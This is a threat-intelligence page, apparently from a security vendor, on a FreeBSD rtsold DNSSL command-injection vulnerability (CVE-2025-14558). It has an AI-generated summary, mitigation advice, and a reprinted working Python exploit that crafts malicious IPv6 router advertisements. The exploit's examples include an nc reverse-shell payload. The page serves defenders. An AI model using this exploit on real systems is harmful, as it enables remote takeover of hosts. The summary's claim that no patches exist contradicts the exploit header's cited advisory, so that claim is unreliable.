FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
AI Analysis
Technical Summary
The vulnerability targets the rtsold daemon in FreeBSD 15.x, which is responsible for router solicitation and managing IPv6 router advertisements. Specifically, the flaw is triggered via the DNSSL (DNS Search List) option processing, where malformed or maliciously crafted DNSSL data can lead to remote code execution. This occurs because rtsold improperly handles or parses the DNSSL option, allowing an attacker to inject and execute arbitrary code on the affected system without requiring authentication or user interaction. The exploit leverages network-level access, typically requiring the attacker to be on the same local network or able to send packets to the vulnerable host. The availability of a Python-based exploit script lowers the barrier for attackers to weaponize this vulnerability. Although no patches have been released yet, the critical nature of this flaw demands immediate attention. The vulnerability impacts the confidentiality, integrity, and availability of affected systems, potentially allowing attackers to take full control, disrupt services, or pivot within networks.
Potential Impact
For European organizations, the impact is significant, especially for those using FreeBSD 15.x in network infrastructure, embedded devices, or critical systems. Successful exploitation can lead to full system compromise, data breaches, service disruption, and lateral movement within corporate networks. This can affect sectors such as telecommunications, government, finance, and critical infrastructure operators who rely on FreeBSD for stability and security. The lack of authentication and ease of exploitation increase the risk of widespread attacks once exploit code becomes widely used. Additionally, the potential for remote code execution can facilitate ransomware deployment or espionage activities, posing severe operational and reputational risks.
Mitigation Recommendations
Since no official patches are currently available, organizations should immediately implement network-level mitigations such as filtering or blocking unsolicited IPv6 router solicitation packets from untrusted sources. Disable or restrict the use of rtsold where feasible, especially on systems exposed to untrusted networks. Employ network segmentation to limit exposure of vulnerable FreeBSD hosts. Monitor network traffic for suspicious DNSSL option packets and anomalous rtsold activity. Consider deploying intrusion detection/prevention systems with custom signatures targeting this exploit. Maintain up-to-date backups and prepare incident response plans for potential exploitation. Stay alert for official patches or advisories from FreeBSD and apply them promptly once released. Engage with FreeBSD community channels for updates and mitigation guidance.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Norway, Denmark
Indicators of Compromise
- exploit-code: # Exploit Title: FreeBSD rtsold 15.x - Remote Code Execution via DNSSL # Date: 2025-12-16 # Exploit Author: Lukas Johannes Möller # Vendor Homepage: https://www.freebsd.org/ # Version: FreeBSD 13.x, 14.x, 15.x (before 2025-12-16 patches) # Tested on: FreeBSD 14.1-RELEASE # CVE: CVE-2025-14558 # # Description: # rtsold(8) processes IPv6 Router Advertisement DNSSL options without # validating domain names for shell metacharacters. The decoded domains # are passed to resolvconf(8), a shell script that uses unquoted variable # expansion, enabling command injection via $() substitution. # # Requirements: # - Layer 2 adjacency to target # - Target running rtsold with ACCEPT_RTADV enabled # - Root privileges (raw socket for sending RA) # - Python 3 + Scapy # # References: # https://security.FreeBSD.org/advisories/FreeBSD-SA-25:12.rtsold.asc # https://github.com/JohannesLks/CVE-2025-14558 import argparse import struct import sys import time try: from scapy.all import ( Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo, ICMPv6NDOptSrcLLAddr, Raw, get_if_hwaddr, sendp ) except ImportError: sys.exit("[!] Scapy required: pip install scapy") def encode_domain(name): """Encode domain in DNS wire format (RFC 1035).""" result = b"" for label in name.split("."): if label: data = label.encode() result += bytes([len(data)]) + data return result + b"\x00" def encode_payload(cmd): """Encode payload as DNS label with $() wrapper for command substitution.""" payload = f"$({cmd})".encode() if len(payload) > 63: # Split long payloads across labels (dots inserted on decode) result = b"" while payload: chunk = payload[:63] payload = payload[63:] result += bytes([len(chunk)]) + chunk return result + b"\x00" return bytes([len(payload)]) + payload + b"\x00" def build_dnssl(cmd, lifetime=0xFFFFFFFF): """Build DNSSL option (RFC 6106) with injected command.""" data = encode_domain("x.local") + encode_payload(cmd) # Pad to 8-byte boundary pad = (8 - (len(data) + 8) % 8) % 8 data += b"\x00" * pad # Type=31 (DNSSL), Length in 8-octet units length = (8 + len(data)) // 8 return struct.pack(">BBH", 31, length, 0) + struct.pack(">I", lifetime) + data def build_ra(mac, payload): """Build Router Advertisement with malicious DNSSL.""" return ( Ether(src=mac, dst="33:33:00:00:00:01") / IPv6(src="fe80::1", dst="ff02::1", hlim=255) / ICMPv6ND_RA(chlim=64, M=0, O=1, routerlifetime=1800) / ICMPv6NDOptSrcLLAddr(lladdr=mac) / ICMPv6NDOptPrefixInfo( prefixlen=64, L=1, A=1, validlifetime=2592000, preferredlifetime=604800, prefix="2001:db8::" ) / Raw(load=build_dnssl(payload)) ) def main(): p = argparse.ArgumentParser( description="CVE-2025-14558 - FreeBSD rtsold DNSSL Command Injection", epilog="Examples:\n" " %(prog)s -i eth0\n" " %(prog)s -i eth0 -p 'id>/tmp/pwned'\n" " %(prog)s -i eth0 -p 'nc LHOST 4444 -e /bin/sh'", formatter_class=argparse.RawDescriptionHelpFormatter ) p.add_argument("-i", "--interface", required=True, help="Network interface") p.add_argument("-p", "--payload", default="touch /tmp/pwned", help="Command to execute") p.add_argument("-c", "--count", type=int, default=3, help="Packets to send (default: 3)") args = p.parse_args() try: mac = get_if_hwaddr(args.interface) except Exception as e: sys.exit(f"[!] Interface error: {e}") print(f"[*] Interface: {args.interface} ({mac})") print(f"[*] Payload: {args.payload}") pkt = build_ra(mac, args.payload) for i in range(args.count): sendp(pkt, iface=args.interface, verbose=False) print(f"[+] Sent RA {i+1}/{args.count}") if i < args.count - 1: time.sleep(1) print("[+] Done") if __name__ == "__main__": main()
FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
Description
FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
AI-Powered Analysis
Technical Analysis
The vulnerability targets the rtsold daemon in FreeBSD 15.x, which is responsible for router solicitation and managing IPv6 router advertisements. Specifically, the flaw is triggered via the DNSSL (DNS Search List) option processing, where malformed or maliciously crafted DNSSL data can lead to remote code execution. This occurs because rtsold improperly handles or parses the DNSSL option, allowing an attacker to inject and execute arbitrary code on the affected system without requiring authentication or user interaction. The exploit leverages network-level access, typically requiring the attacker to be on the same local network or able to send packets to the vulnerable host. The availability of a Python-based exploit script lowers the barrier for attackers to weaponize this vulnerability. Although no patches have been released yet, the critical nature of this flaw demands immediate attention. The vulnerability impacts the confidentiality, integrity, and availability of affected systems, potentially allowing attackers to take full control, disrupt services, or pivot within networks.
Potential Impact
For European organizations, the impact is significant, especially for those using FreeBSD 15.x in network infrastructure, embedded devices, or critical systems. Successful exploitation can lead to full system compromise, data breaches, service disruption, and lateral movement within corporate networks. This can affect sectors such as telecommunications, government, finance, and critical infrastructure operators who rely on FreeBSD for stability and security. The lack of authentication and ease of exploitation increase the risk of widespread attacks once exploit code becomes widely used. Additionally, the potential for remote code execution can facilitate ransomware deployment or espionage activities, posing severe operational and reputational risks.
Mitigation Recommendations
Since no official patches are currently available, organizations should immediately implement network-level mitigations such as filtering or blocking unsolicited IPv6 router solicitation packets from untrusted sources. Disable or restrict the use of rtsold where feasible, especially on systems exposed to untrusted networks. Employ network segmentation to limit exposure of vulnerable FreeBSD hosts. Monitor network traffic for suspicious DNSSL option packets and anomalous rtsold activity. Consider deploying intrusion detection/prevention systems with custom signatures targeting this exploit. Maintain up-to-date backups and prepare incident response plans for potential exploitation. Stay alert for official patches or advisories from FreeBSD and apply them promptly once released. Engage with FreeBSD community channels for updates and mitigation guidance.
Affected Countries
Technical Details
- Edb Id
- 52463
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
# Exploit Title: FreeBSD rtsold 15.x - Remote Code Execution via DNSSL # Date: 2025-12-16 # Exploit Author: Lukas Johannes Möller # Vendor Homepage: https://www.freebsd.org/ # Version: FreeBSD 13.x, 14.x, 15.x (before 2025-12-16 patches) # Tested on: FreeBSD 14.1-RELEASE # CVE: CVE-2025-14558 # # Description: # rtsold(8) processes IPv6 Router Advertisement DNSSL options without # validating domain names for shell metacharacters. The decoded domains # are passed to resolvconf(8), a shell sc... (3609 more characters)
Threat ID: 694d89022ffa995e0c012b37
Added to database: 12/25/2025, 6:57:06 PM
Last enriched: 1/17/2026, 8:04:09 AM
Last updated: 2/7/2026, 5:36:24 AM
Views: 952
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
ThreatsDay Bulletin: Codespaces RCE, AsyncRAT C2, BYOVD Abuse, AI Cloud Intrusions & 15+ Stories
LowCritical SmarterMail Vulnerability Exploited in Ransomware Attacks
CriticalResearchers Expose Network of 150 Cloned Law Firm Websites in AI-Powered Scam Campaign
MediumItaly Averted Russian-Linked Cyberattacks Targeting Winter Olympics Websites, Foreign Minister Says
MediumDEAD#VAX Malware Campaign Deploys AsyncRAT via IPFS-Hosted VHD Phishing Files
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.